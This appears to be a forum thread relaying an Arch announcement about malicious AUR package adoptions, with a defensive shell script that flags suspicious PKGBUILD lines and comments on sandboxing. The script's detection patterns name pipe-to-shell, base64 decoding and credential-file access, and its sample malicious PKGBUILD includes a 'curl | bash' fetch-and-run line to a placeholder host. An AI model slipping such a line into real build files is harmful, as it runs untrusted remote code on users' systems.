We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.

We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed. While this is happening, and while we work to create a more permanent solution, users may see issues with the following:

  • Creating new accounts on the AUR
  • Pushing package updates
  • Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.
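A small review helper in the spirit of the advice above, added here as an example and not part of the Arch announcement or of any Arch tooling: it shows what changed in the PKGBUILD and .install files of an AUR checkout and flags lines that deserve a second look before makepkg runs. The package name, URLs and file contents in the sample are constructed, and the patterns are heuristics, not a verdict.

```shell
#!/bin/sh
# Added example: pre-makepkg review helper for an AUR checkout.
# review_files FILE...  ->  prints FILE:LINE:TEXT for each flagged line,
# returns 1 if anything was flagged, 0 otherwise.
review_files() {
    flagged=0
    for f in "$@"; do
        [ -f "$f" ] || continue
        # remote "pipe to shell", decoded payloads, eval, skipped checksums,
        # and anything touching the user's home/cron/services from a build
        if grep -nE \
            -e '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' \
            -e 'base64[[:space:]]+(-d|--decode)' \
            -e '(^|[^a-z_])eval[[:space:]]' \
            -e 'sums=\([^)]*SKIP' \
            -e '\$HOME|~/|\.bashrc|\.profile|\.ssh/|crontab|systemctl[[:space:]]+enable' \
            "$f"; then
            flagged=1
        fi
    done
    return "$flagged"
}

# review_update DIR  ->  diff since the previous HEAD, then scan the files.
# Assumes DIR is a git clone of the AUR package and is run right after `git pull`.
review_update() {
    git -C "$1" --no-pager diff 'HEAD@{1}' HEAD -- PKGBUILD '*.install' || true
    review_files "$1"/PKGBUILD "$1"/*.install
}

# Constructed sample input so the helper can be exercised offline.
sample_dir=$(mktemp -d)
cat >"$sample_dir/PKGBUILD.clean" <<'EOF'
pkgname=example-tool
pkgver=1.2.0
source=("$pkgname-$pkgver.tar.gz::https://example.invalid/tool.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() { install -Dm755 tool "$pkgdir/usr/bin/tool"; }
EOF
cat >"$sample_dir/PKGBUILD.bad" <<'EOF'
pkgname=example-tool
pkgver=1.2.1
source=("$pkgname-$pkgver.tar.gz::https://example.invalid/tool.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 tool "$pkgdir/usr/bin/tool"
  curl -s https://example.invalid/setup | bash
}
EOF
review_files "$sample_dir/PKGBUILD.bad" || echo "flagged lines above: read them before building"
```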

  • TheModerateTankie [any]@hexbear.net · 2 · 3 days ago

    This is one of the reasons why I prefer the user/sandbox model of something like the “atomic” distros or flatpak, despite some occasional annoyances with privileges. If you use a traditional package manager everything in the repository gets installed as root and has access to everything on your computer. Most of the desktop software people use probably doesn’t need to be installed at the root level. Generally not a problem when the software is reviewed and maintained by a competent distro, aside from cases like xz utils, but adding repositories or using something like the AUR elevates the risk. At the very least it seems like AUR should be sandboxed and/or installed at the user level only by default. I dunno, maybe this new exploit would still be a problem if that were the case, but it just seems like an obviously flawed paradigm people have just accepted because Linux malware has been relatively rare compared to Windows, and adding security layers is a hassle.

    • AssortedBiscuits [they/them]@hexbear.net OP · 2 · 3 days ago

      It’s definitely exciting times. I don’t like how the AUR is touted by the Arch community as something that makes Arch stand out compared with other distros until something like this happens, and then it’s “Well, you should only use the AUR if you know what you’re doing. Arch is explicit about how the AUR hasn’t been vetted, so you can’t pin this on Arch. Caveat emptor.”

      • TheModerateTankie [any]@hexbear.net · 2 · 3 days ago

        It’s weird that it’s so heavily promoted to new users these days. “Just read all the notes before you update, bro” on a system that constantly updates…